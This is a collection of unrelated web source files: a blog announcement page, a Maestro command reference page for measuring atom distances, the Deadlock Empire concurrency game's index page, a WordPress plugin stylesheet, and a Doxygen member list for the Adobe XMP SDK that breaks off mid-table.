<script defer type="text/javascript" id="MathJax-script" src="https://cdn.jsdelivr.net/npm/mathjax@3.1.2/es5/tex-mml-chtml.js"></script>
<script defer src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
</head>
<body class="fixed-top-nav sticky-bottom-footer">
<!-- Header -->
<header>
<!-- Nav Bar -->
<nav id="navbar" class="navbar navbar-light navbar-expand-sm fixed-top">
<div class="container">
<a class="navbar-brand title font-weight-lighter" href="/">
<span class="font-weight-bold">Andrea</span> Madotto
</a>
<!-- Navbar Toogle -->
<button class="navbar-toggler collapsed ml-auto" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar top-bar"></span>
<span class="icon-bar middle-bar"></span>
<span class="icon-bar bottom-bar"></span>
</button>
<div class="collapse navbar-collapse text-right" id="navbarNav">
<ul class="navbar-nav ml-auto flex-nowrap">
<!-- About -->
<li class="nav-item ">
<a class="nav-link" href="/">
About
</a>
</li>
<!-- Blog -->
<li class="nav-item ">
<a class="nav-link" href="/blog/">
Blog
</a>
</li>
<!-- Other pages -->
<li class="nav-item ">
<a class="nav-link" href="/CV/">
Curriculum
</a>
</li>
<li class="nav-item ">
<a class="nav-link" href="/publications/">
Publications
</a>
</li>
</ul>
</div>
</div>
</nav>
</header>
<!-- Content -->
<div class="container mt-5">
<div class="post">
<header class="post-header">
<h1 class="post-title">Announcement_11</h1>
<p class="post-meta">April 3, 2021</p>
</header>
<article class="post-content">
<p>BiToD accepted at NeurIPS2021 Benchmark Track</p>
</article>
</div>
</div>
<!-- Footer -->
<footer class="sticky-bottom mt-5">
<div class="container">
© Copyright 2021 Andrea Madotto.
Powered by <a href="http://jekyllrb.com/" target="_blank">Jekyll</a> with <a href="https://github.com/alshedivat/al-folio">al-folio</a> theme.
Last updated: September 23, 2021.
</div>
</footer>
</body>
<!-- jQuery -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js" integrity="sha512-bLT0Qm9VnAYZDflyKcBaQ2gg0hSYNQrJ8RilYldYQ1FxQYoCLtUjuuRuZo+fjqhx/qtq/1itJ0C2ejDxltZVFg==" crossorigin="anonymous"></script>
<!-- Bootsrap & MDB scripts -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/2.4.4/umd/popper.min.js" integrity="sha512-eUQ9hGdLjBjY3F41CScH3UX+4JDSI9zXeroz7hJ+RteoCaY+GP/LDoM8AO+Pt+DRFw3nXqsjh9Zsts8hnYv8/A==" crossorigin="anonymous"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js" integrity="sha512-M5KW3ztuIICmVIhjSqXe01oV2bpe248gOxqmlcYrEzAvws7Pw3z6BK0iGbrwvdrUQUhi3eXgtxp5I8PDo9YfjQ==" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/mdbootstrap/4.19.1/js/mdb.min.js" integrity="sha512-Mug9KHKmroQFMLm93zGrjhibM2z2Obg9l6qFG2qKjXEXkMp/VDkI4uju9m4QKPjWSwQ6O2qzZEnJDEeCw0Blcw==" crossorigin="anonymous"></script>
<!-- Mansory & imagesLoaded -->
<script defer src="https://unpkg.com/masonry-layout@4/dist/masonry.pkgd.min.js"></script>
<script defer src="https://unpkg.com/imagesloaded@4/imagesloaded.pkgd.min.js"></script>
<script defer src="/assets/js/mansory.js" type="text/javascript"></script>
<!-- Load Common JS -->
<script src="/assets/js/common.js"></script>
<!-- Load DarkMode JS -->
<script src="/assets/js/dark_mode.js"></script>
</html>
|
Schrodinger/Schrodinger_2017-1_docs/maestro_command_reference/distance.html
|
platinhom/ManualHom
|
<!DOCTYPE html>
<html xmlns:MadCap="http://www.madcapsoftware.com/Schemas/MadCap.xsd" lang="en-US" xml:lang="en-US" data-mc-search-type="Stem" data-mc-help-system-file-name="Documentation.xml" data-mc-path-to-help-system="../" data-mc-target-type="WebHelp2" data-mc-runtime-file-type="Topic" data-mc-preload-images="false" data-mc-in-preview-mode="false" data-mc-toc-path="Command References|Maestro Command Reference|The Maestro Command Language">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link href="../Skins/Default/Stylesheets/Slideshow.css" rel="stylesheet" type="text/css" data-mc-generated="True" />
<link href="../Skins/Default/Stylesheets/TextEffects.css" rel="stylesheet" type="text/css" data-mc-generated="True" />
<link href="../Skins/Default/Stylesheets/Topic.css" rel="stylesheet" type="text/css" data-mc-generated="True" />
<link href="../Skins/Default/Stylesheets/Components/Styles.css" rel="stylesheet" type="text/css" data-mc-generated="True" /><title>distance</title>
<link href="../Resources/Stylesheets/docs.css" rel="stylesheet" />
<script src="../Resources/Scripts/custom.modernizr.js" type="text/javascript">
</script>
<script src="../Resources/Scripts/jquery.min.js" type="text/javascript">
</script>
<script src="../Resources/Scripts/require.min.js" type="text/javascript">
</script>
<script src="../Resources/Scripts/require.config.js" type="text/javascript">
</script>
<script src="../Resources/Scripts/foundation.min.js" type="text/javascript">
</script>
<script src="../Resources/Scripts/plugins.min.js" type="text/javascript">
</script>
<script src="../Resources/Scripts/MadCapAll.js" type="text/javascript">
</script>
</head>
<body><a name="aanchor1397"></a>
<MadCap:concept term="Command References" /><a name="aanchor1398"></a>
<MadCap:concept term="Maestro" />
<table class="NavLink" data-mc-conditions="Default.ScreenOnly">
<tr class="NavLink">
<td class="NavLeft"><span class="NavText">◀ <a class="NavLink MCXref xref xrefNavLink" href="displaypiinteractionsmode.html" xrefformat="{paratext}">displaypiinteractionsmode</a></span>
</td>
<td class="NavCenter"><span class="NavText"><a class="NavLink MCXref xref xrefNavLink" href="maestro_command_referenceTOC.htm" xrefformat="{paratext}">Maestro Command Reference Manual</a></span>
</td>
<td class="NavRight"><span class="NavText"><a class="NavLink MCXref xref xrefNavLink" href="distancecheck.html" xrefformat="{paratext}">distancecheck</a> ▶</span>
</td>
</tr>
</table>
<h1 class="title">distance</h1>
<p>Specifies a pair of atoms to have their distance measured and displayed. </p>
<p>Syntax: <b>distance</b> <i>surfacename1</i>= <text> <i>surfacename2</i>= <text> <i>surfacex1</i>= <x> <i>surfacex2</i>= <x> <i>surfacey1</i>= <x> <i>surfacey2</i>= <x> <i>surfacez1</i>= <x> <i>surfacez2</i>= <x> <i>xoffset</i>= <x> <i>yoffset</i>= <x> [<atom1> <atom2> ]
</p>
<p>Options:</p>
<dl>
<dt><i>surfacename1</i>
</dt>
<br />
<dd>Specifies the name of surface on which atom1 sits. </dd>
<br />
<dd>
<table summary="">
<tr align="left">
<td valign="top">Valid values:</td>
<td>
text strings<br /></td>
</tr>
<tr align="left">
<td valign="top">Default value: </td>
<td valign="top"><b> </b>
<br />
</td>
</tr>
</table>
</dd>
<br />
<dt><i>surfacename2</i>
</dt>
<br />
<dd>Specifies the name of surface on which atom1 sits. </dd>
<br />
<dd>
<table summary="">
<tr align="left">
<td valign="top">Valid values:</td>
<td>
text strings<br /></td>
</tr>
<tr align="left">
<td valign="top">Default value: </td>
<td valign="top"><b> </b>
<br />
</td>
</tr>
</table>
</dd>
<br />
<dt><i>surfacex1</i>
</dt>
<br />
<dd>Specifies the X coordinate for atom1 on surface. </dd>
<br />
<dd>
<table summary="">
<tr align="left">
<td valign="top">Valid values:</td>
<td>
reals<br /></td>
</tr>
<tr align="left">
<td valign="top">Default value: </td>
<td valign="top"><b>0</b>
<br />
</td>
</tr>
</table>
</dd>
<br />
<dt><i>surfacex2</i>
</dt>
<br />
<dd>Specifies the X coordinate for atom2 on surface. </dd>
<br />
<dd>
<table summary="">
<tr align="left">
<td valign="top">Valid values:</td>
<td>
reals<br /></td>
</tr>
<tr align="left">
<td valign="top">Default value: </td>
<td valign="top"><b>0</b>
<br />
</td>
</tr>
</table>
</dd>
<br />
<dt><i>surfacey1</i>
</dt>
<br />
<dd>Specifies the Y coordinate for atom1 on surface. </dd>
<br />
<dd>
<table summary="">
<tr align="left">
<td valign="top">Valid values:</td>
<td>
reals<br /></td>
</tr>
<tr align="left">
<td valign="top">Default value: </td>
<td valign="top"><b>0</b>
<br />
</td>
</tr>
</table>
</dd>
<br />
<dt><i>surfacey2</i>
</dt>
<br />
<dd>Specifies the Y coordinate for atom2 on surface. </dd>
<br />
<dd>
<table summary="">
<tr align="left">
<td valign="top">Valid values:</td>
<td>
reals<br /></td>
</tr>
<tr align="left">
<td valign="top">Default value: </td>
<td valign="top"><b>0</b>
<br />
</td>
</tr>
</table>
</dd>
<br />
<dt><i>surfacez1</i>
</dt>
<br />
<dd>Specifies the Z coordinate for atom1 on surface. </dd>
<br />
<dd>
<table summary="">
<tr align="left">
<td valign="top">Valid values:</td>
<td>
reals<br /></td>
</tr>
<tr align="left">
<td valign="top">Default value: </td>
<td valign="top"><b>0</b>
<br />
</td>
</tr>
</table>
</dd>
<br />
<dt><i>surfacez2</i>
</dt>
<br />
<dd>Specifies the Z coordinate for atom2 on surface. </dd>
<br />
<dd>
<table summary="">
<tr align="left">
<td valign="top">Valid values:</td>
<td>
reals<br /></td>
</tr>
<tr align="left">
<td valign="top">Default value: </td>
<td valign="top"><b>0</b>
<br />
</td>
</tr>
</table>
</dd>
<br />
<dt><i>xoffset</i>
</dt>
<br />
<dd>Specifies the X offset in Angstroms. Any distance created after this value is set will use this new value. Can be applied to an existing measurement by respecifying the measurement. Does not affect any already created distances. </dd>
<br />
<dd>
<table summary="">
<tr align="left">
<td valign="top">Valid values:</td>
<td>
reals<br /></td>
</tr>
<tr align="left">
<td valign="top">Default value: </td>
<td valign="top"><b>0</b>
<br />
</td>
</tr>
</table>
</dd>
<br />
<dt><i>yoffset</i>
</dt>
<br />
<dd>Specifies the Y offset in Angstroms. Any distance created after this value is set will use this new value. Can be applied to an existing measurement by respecifying the measurement. Does not affect any already created distances. </dd>
<br />
<dd>
<table summary="">
<tr align="left">
<td valign="top">Valid values:</td>
<td>
reals<br /></td>
</tr>
<tr align="left">
<td valign="top">Default value: </td>
<td valign="top"><b>0</b>
<br />
</td>
</tr>
</table>
</dd>
<br />
</dl>
<p>Operands:</p>
<p><atom1> <atom2> </p>
<p>The two atoms between which the distance is to be measured. Note that the specifying a-b is the same as specifying b-a. </p>
<table class="NavLink" data-mc-conditions="Default.ScreenOnly">
<tr class="NavLink">
<td class="NavLeft"><span class="NavText">◀ <a class="NavLink MCXref xref xrefNavLink" href="displaypiinteractionsmode.html" xrefformat="{paratext}">displaypiinteractionsmode</a></span>
</td>
<td class="NavCenter"><span class="NavText"><a class="NavLink MCXref xref xrefNavLink" href="maestro_command_referenceTOC.htm" xrefformat="{paratext}">Maestro Command Reference Manual</a></span>
</td>
<td class="NavRight"><span class="NavText"><a class="NavLink MCXref xref xrefNavLink" href="distancecheck.html" xrefformat="{paratext}">distancecheck</a> ▶</span>
</td>
</tr>
</table>
</body>
</html>
|
index.html
|
deadlockempire/deadlockempire.github.io
|
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<!--<link href='https://fonts.googleapis.com/css?family=Amatic+SC' rel='stylesheet' type='text/css'>-->
<link href='https://fonts.googleapis.com/css?family=Cabin' rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="css/bootstrap.min.css">
<link rel="stylesheet" href="css/bootstrap-theme.min.css">
<link rel="stylesheet" href="css/introjs.css">
<link rel='icon' href='img/favicon.png'>
<!-- <link rel="stylesheet" href="css/bootstrap-solarized-dark.css">
-->
<link rel="stylesheet" href="css/main.css">
<title>The Deadlock Empire</title>
<script src="js/3rdparty/jquery.js"></script>
<script src="js/3rdparty/bootstrap.min.js"></script>
<script src="js/3rdparty/bootbox.min.js"></script>
<script src="js/3rdparty/intro.js"></script>
<script src="js/3rdparty/mousetrap.min.js"></script>
<script src="js/game_state.js"></script>
<script src="js/ui.js"></script>
<script src="js/win.js"></script>
<script src="js/common.js"></script>
<script src="js/language.js"></script>
<script src="js/expression.js"></script>
<script src="js/variables.js"></script>
<script src="js/instructions/instructions.js"></script>
<script src="js/instructions/instructions-synchronization.js"></script>
<script src="js/instructions/instructions-high-level-synchronization.js"></script>
<script src="js/instructions/instructions-queue.js"></script>
<script src="js/level.js"></script>
<script src="js/thread.js">s</script>
<script src="js/main.js"></script>
<script src="js/menu.js"></script>
<script src="js/content/levels.js"></script>
<script src="js/content/dragons.js"></script>
<script src="js/content/tutorial.js"></script>
<script src="js/content/levels-high-level-primitives.js"></script>
<script src="js/content/campaign.js"></script>
<!--
Google Analytics.
We are deeply sorry if you are offended by our
collection of pageview data. We suggest using tracking
protection - for example, modern versions of Firefox
can automatically disable any tracking scripts.
Thank you for playing The Deadlock Empire and we hope
you can forgive us for infringing on your privacy.
http://hudecekpetr.cz/friend.html
-->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-73203312-1', 'auto');
ga('send', 'pageview');
</script>
<!-- Open Graph tags to customize Facebook link previews. -->
<meta property="og:url" content="https://deadlockempire.github.io">
<meta property="og:title" content="The Deadlock Empire">
<meta property="og:description" content="Slay dragons, learn
concurrency! Play the cunning Scheduler, exploit flawed
programs and defeat the armies of the Parallel Wizard.">
<meta property="og:image" content="http://deadlockempire.github.io/img/logo-large.png">
</head>
<body>
<!-- Load Facebook SDK for JavaScript -->
<div id="fb-root"></div>
<script>
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src =
"//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.2&appId=100259203407083";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
</script>
<div id="mainContainer">
<div class="container">
<div id="game-window">
<div id="debug-toolbar" style="border: 1px solid black; width: 100%; margin: 2px; padding: 2px;">
This is the toolbar. | Select level:
<select id="levelSelect" >
</select>
<button class="btn btn-default" id="start">Start</button>
|
<button class="btn btn-default" id="goToMain">Go To Main Menu</button>
|
<button class="btn btn-default" id="clearProgress">Clear Saved Progress</button>
</div>
<div id="mainarea">
</div>
<div id="alert" style="display: none; border: 1px solid black;">
<button class="btn btn-default" id="alertHide">[Hide]</button>
<span id="alertCaption" style="font-weight: bold;">Title</span><br>
<span id="alertText">This is the alert message.</span>
</div>
<footer>
<span class="fb-share-button"
data-href="https://deadlockempire.github.io"
data-layout="button_count">
</span>
<span id="credits">
Got any ideas or feedback? Both are much
appreciated at <a href="http://goo.gl/forms/i05ukNUMmB">this form</a>.<br>
GitHub: <a href="https://github.com/deadlockempire/deadlockempire.github.io">deadlockempire/deadlockempire.github.io</a>.
Made by <a href="http://hudecekpetr.cz">Petr Hudeček</a>
and <a href="http://rny.cz">Michal Pokorný</a> at
HackCambridge 2016.
</span>
</footer>
</div>
</div>
<div id="win-screen">
<div class="container">
<div class="top-section">
<span class="icon glyphicon glyphicon-ok"></span>
<h3>
<span id="win-congratulation">
You win!
</span>
</h3>
<div class="victory-condition">
</div>
</div>
<div class="win-part">
<div id="win-message"></div>
</div>
<div class="buttons">
<button id="dismiss-win" class="btn btn-default">Back to the code</button>
<button id="win-go-to-menu" class="btn btn-default">Return to Main Menu</button>
<button id="win-next-level" class="btn btn-primary">Next challenge
<span class="glyphicon glyphicon-chevron-right"></span></button>
</div>
</div>
</div>
<div id="lose-screen">
<div class="container">
<div class="top-section">
<span class="icon glyphicon glyphicon-remove"></span>
<h3>
<span id="fail-heading">
Challenge lost!
</span>
</h3>
</div>
<div class="lose-part">
<div id="lose-message"></div>
<div class="failure-condition">
</div>
</div>
<div class="buttons">
<button id="lose-restart" class="btn btn-primary">Reset and try again</button>
<button id="lose-step-back" class="btn btn-default">Return to code and undo last step</button>
<button id="lose-go-to-menu" class="btn btn-default">Return to Main Menu</button>
</div>
</div>
</div> </div>
</body>
</html>
|
wp-content/plugins/brs-booking-reservation-system-woocommerce/includes/vendor/cuztom/assets/css/style.css
|
JeremyCarlsten/WordpressWork
|
.cuztom {
width: 100%;
}
.cuztom .cuztom-box-description {
padding-bottom: 10px;
border-bottom: 1px solid #dfdfdf;
font-style: italic;
}
.cuztom .cuztom-tabs {
padding-top: 10px;
}
.cuztom .js-cuztom-remove-media {
display: inline-block;
margin-left: 10px;
}
.cuztom .cuztom-ajax-save {
display: inline-block;
vertical-align: middle;
height: 23px;
}
/* Wraps */
.cuztom .padding-wrap {
padding: 5px 0 0 0;
}
.cuztom .wp-editor-wrap {
margin-bottom: 10px;
}
.cuztom .cuztom-checkboxes-wrap {
width: 30%;
margin-right: 10px;
display: inline-block;
vertical-align: middle;
max-height: 100px;
overflow-y: scroll;
overflow-x: hidden;
}
.cuztom .cuztom-checkbox-wrap {
width: 10%;
margin-right: 10px;
display: inline-block;
vertical-align: middle;
}
/* Tabs */
.cuztom .cuztom-tabs .ui-state-active {
border-color: #ccc;
background: #fff;
}
.cuztom .cuztom-tabs .ui-state-active a {
color: #d54e21;
}
/* Table */
.cuztom .cuztom-table {
width: 100%;
margin-top: 0;
}
.cuztom .cuztom-table th {
font-weight: normal;
text-align: left;
vertical-align: top;
}
.cuztom .cuztom-table th label {
font-size: 12px;
font-weight: bold;
}
.cuztom .cuztom-table th .cuztom-required {
color: red;
}
.cuztom .cuztom-table th .cuztom-description,
.cuztom .cuztom-table td .cuztom-explanation {
font-size: 10px;
font-style: italic;
font-weight: normal;
}
.cuztom .cuztom-table td .cuztom-explanation {
display: block;
}
/* Sortable */
.cuztom .cuztom-handle-sortable,
.cuztom .cuztom-remove-sortable {
display: inline-block;
vertical-align: middle;
height: 16px;
width: 16px;
background: url('../images/jquery-ui/ui-icons_454545_256x240.png') no-repeat;
}
.cuztom .cuztom-handle-sortable {
background-position: -132px -48px;
cursor: move;
}
.cuztom .cuztom-remove-sortable {
background-position: -77px -128px;
cursor: pointer;
}
.cuztom .cuztom-sortable-item fieldset {
display: inline-block;
vertical-align: middle;
border: 1px solid #ccc;
padding: 10px;
border-radius: 2px;
-webkit-border-radius: 2px;
-moz-border-radius: 2px;
width: 90%;
}
/* Input */
.cuztom textarea,
.cuztom input[type="text"] {
width: 80%;
display: inline-block;
vertical-align: middle;
}
.cuztom textarea {
height: 100px;
}
.cuztom select {
min-width: 160px;
}
.cuztom .cuztom-preview {
width: 100%;
display: block;
margin-top: 8px;
}
.cuztom .cuztom-preview img {
max-width: 100%;
height: auto;
}
.cuztom .mceContentBody,
.cuztom .mceIframeContainer {
background: #fff !important;
}
.cuztom .mceStatusbar {
width: 100% !important;
padding-left: 0 !important;
text-indent: 10px;
}
.cuztom.form-field input[type="button"] {
width: auto;
}
/* Misc */
.cuztom .cuztom-mime {
padding: 5px 0 5px 25px;
display: block;
background: url('../images/mime/file.png') 0 2px no-repeat;
}
.cuztom .wp-picker-container {
width: 100%;
}
.cuztom input[type="text"].wp-color-picker,
.cuztom .wp-picker-clear {
width: auto;
}
.cuztom .iris-picker .iris-slider-offset {
position: absolute;
top: 0px;
left: 0;
width: 100%;
height: 100%;
background: none;
border: none;
}
/* Responsive wysiwyg editor */
.cuztom .tmce-active table {
max-width: none;
}
.cuztom .tmce-active table.mceLayout, .cuztom table.mceToolbar {
width: 100% !important;
height: auto !important;
}
.cuztom .tmce-active span.mceEditor {
display: block !important;
}
.cuztom .mceToolbar div, .cuztom table.mceToolbar tr {
white-space: normal;
}
.cuztom table.mceToolbar td {
display: inline-block;
white-space: normal;
}
/* Side meta box */
#side-sortables .cuztom-table {
}
#side-sortables .cuztom-table th {
padding: 0 0 10px 0;
width: 30%;
}
#side-sortables .cuztom-table td {
padding: 0 0 10px 0;
width: 70%;
}
#side-sortables .cuztom-table .cuztom-description,
#side-sortables .cuztom-table .cuztom-explanation {
display: none;
}
#side-sortables .cuztom-table .cuztom-input,
#side-sortables .cuztom-table .cuztom-checkbox-wrap,
#side-sortables .cuztom-table .cuztom-checkboxes-wrap {
width: 100%;
}
#side-sortables .cuztom-table input[type="radio"].cuztom-input,
#side-sortables .cuztom-table input[type="checkbox"].cuztom-input {
width: auto;
}
#side-sortables .cuztom-table .cuztom-colorpicker {
width: 80%;
}
#side-sortables .cuztom-table .cuztom-ajax-save {
clear: both;
}
#side-sortables .cuztom-table .cuztom-remove-media {
margin-left: 0;
}
|
xmp_sdk/docs/API/classAdobeXMPCore_1_1INameSpacePrefixMap__v1-members.html
|
yanburman/sjcam_raw2dng
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<title>Member List</title>
<link href="doxygen.css" rel="stylesheet" type="text/css">
<link href="tabs.css" rel="stylesheet" type="text/css">
</head><body>
<img src="xmp_tagline_small.jpg" width="125" height="50" border="0"><p>
<!-- Generated by Doxygen 1.8.11 -->
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="namespaces.html"><span>Namespaces</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li><a href="classes.html"><span>Class Index</span></a></li>
<li><a href="hierarchy.html"><span>Class Hierarchy</span></a></li>
<li><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
</div><!-- top -->
<div id="side-nav" class="ui-resizable side-nav-resizable">
<div id="nav-tree">
<div id="nav-tree-contents">
<div id="nav-sync" class="sync"></div>
</div>
</div>
<div id="splitbar" style="-moz-user-select:none;"
class="ui-resizable-handle">
</div>
</div>
<script type="text/javascript">
$(document).ready(function(){initNavTree('classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html','');});
</script>
<div id="doc-content">
<div class="header">
<div class="headertitle">
<div class="title">AdobeXMPCore::INameSpacePrefixMap_v1 Member List</div> </div>
</div><!--header-->
<div class="contents">
<p>This is the complete list of members for <a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html">AdobeXMPCore::INameSpacePrefixMap_v1</a>, including all inherited members.</p>
<table class="directory">
<tr class="even"><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1ISharedObject.html#ab90d4ec1fcd975a7ac62dcb866335cdc">Acquire</a>() const __NOTHROW__=0</td><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1ISharedObject.html">AdobeXMPCommon::ISharedObject</a></td><td class="entry"><span class="mlabel">pure virtual</span></td></tr>
<tr><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html#a6ed5fd946dfad6406539562178b3caeb">Clear</a>() __NOTHROW__=0</td><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html">AdobeXMPCore::INameSpacePrefixMap_v1</a></td><td class="entry"><span class="mlabel">pure virtual</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html#ae30d56519a24afe9c22ae353fedbd8f7">Clone</a>() const =0</td><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html">AdobeXMPCore::INameSpacePrefixMap_v1</a></td><td class="entry"><span class="mlabel">pure virtual</span></td></tr>
<tr><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html#a722b12c77879087c26990650d99d3339">CreateNameSpacePrefixMap</a>()</td><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html">AdobeXMPCore::INameSpacePrefixMap_v1</a></td><td class="entry"><span class="mlabel">static</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1IThreadSafe.html#a214bb1b5840dbd5576e764dd2220b261">DisableThreadSafety</a>() const __NOTHROW__=0</td><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1IThreadSafe.html">AdobeXMPCommon::IThreadSafe</a></td><td class="entry"><span class="mlabel">pure virtual</span></td></tr>
<tr><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1IThreadSafe.html#afe35614cb88e2bdb32996cf4ac15b211">EnableThreadSafety</a>() const __NOTHROW__=0</td><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1IThreadSafe.html">AdobeXMPCommon::IThreadSafe</a></td><td class="entry"><span class="mlabel">pure virtual</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html#a16669cda8f88d9af18a248919103df22">GetDefaultNameSpacePrefixMap</a>()</td><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html">AdobeXMPCore::INameSpacePrefixMap_v1</a></td><td class="entry"><span class="mlabel">static</span></td></tr>
<tr><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1IVersionable.html#ad6539461695decfaea8a44798db51e54">GetInterfacePointer</a>()</td><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1IVersionable.html">AdobeXMPCommon::IVersionable</a></td><td class="entry"><span class="mlabel">inline</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1IVersionable.html#ab93a940e2946c14a76ebbd9552cab070">GetInterfacePointer</a>() const </td><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1IVersionable.html">AdobeXMPCommon::IVersionable</a></td><td class="entry"><span class="mlabel">inline</span></td></tr>
<tr><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html#a57a2ef1d7b5f9fb2429220becad03413">GetNameSpace</a>(const char *prefix, sizet prefixLength) const =0</td><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html">AdobeXMPCore::INameSpacePrefixMap_v1</a></td><td class="entry"><span class="mlabel">pure virtual</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html#a5a6915e1bdfa1059f4ad690bcf14a342">GetPrefix</a>(const char *nameSpace, sizet nameSpaceLength) const =0</td><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html">AdobeXMPCore::INameSpacePrefixMap_v1</a></td><td class="entry"><span class="mlabel">pure virtual</span></td></tr>
<tr><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html#a1cff14bbc35fabd9fff60706ebfe23e8">Insert</a>(const char *prefix, sizet prefixLength, const char *nameSpace, sizet nameSpaceLength)=0</td><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html">AdobeXMPCore::INameSpacePrefixMap_v1</a></td><td class="entry"><span class="mlabel">pure virtual</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html#a4ba4127d58b778c0148f853d7a60b8fe">IsEmpty</a>() const __NOTHROW__</td><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html">AdobeXMPCore::INameSpacePrefixMap_v1</a></td><td class="entry"></td></tr>
<tr><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html#ab6fe5421aa97518a85e87bba9f4bc3a6">IsNameSpacePresent</a>(const char *nameSpace, sizet nameSpaceLength) const =0</td><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html">AdobeXMPCore::INameSpacePrefixMap_v1</a></td><td class="entry"><span class="mlabel">pure virtual</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html#a10caae18d32483ff4a5737c448f4f7c3">IsPrefixPresent</a>(const char *prefix, sizet prefixLength) const =0</td><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html">AdobeXMPCore::INameSpacePrefixMap_v1</a></td><td class="entry"><span class="mlabel">pure virtual</span></td></tr>
<tr><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1IThreadSafe.html#a261e2f6af96b75015e5f8318f32be7f9">IsThreadSafe</a>() const =0</td><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1IThreadSafe.html">AdobeXMPCommon::IThreadSafe</a></td><td class="entry"><span class="mlabel">pure virtual</span></td></tr>
<tr class="even"><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1ISharedObject.html#abf5a54e09f87366170ea19c618f68bc3">Release</a>() const __NOTHROW__=0</td><td class="entry"><a class="el" href="classAdobeXMPCommon_1_1ISharedObject.html">AdobeXMPCommon::ISharedObject</a></td><td class="entry"><span class="mlabel">pure virtual</span></td></tr>
<tr><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html#ab030c648e112799541eb3433967207c7">RemoveNameSpace</a>(const char *nameSpace, sizet nameSpaceLength)=0</td><td class="entry"><a class="el" href="classAdobeXMPCore_1_1INameSpacePrefixMap__v1.html">AdobeXMPCore::INameSpacePrefixMap_v1</a></td><td class="entry"><span class="mlabel">pure virtual</span></td></tr>
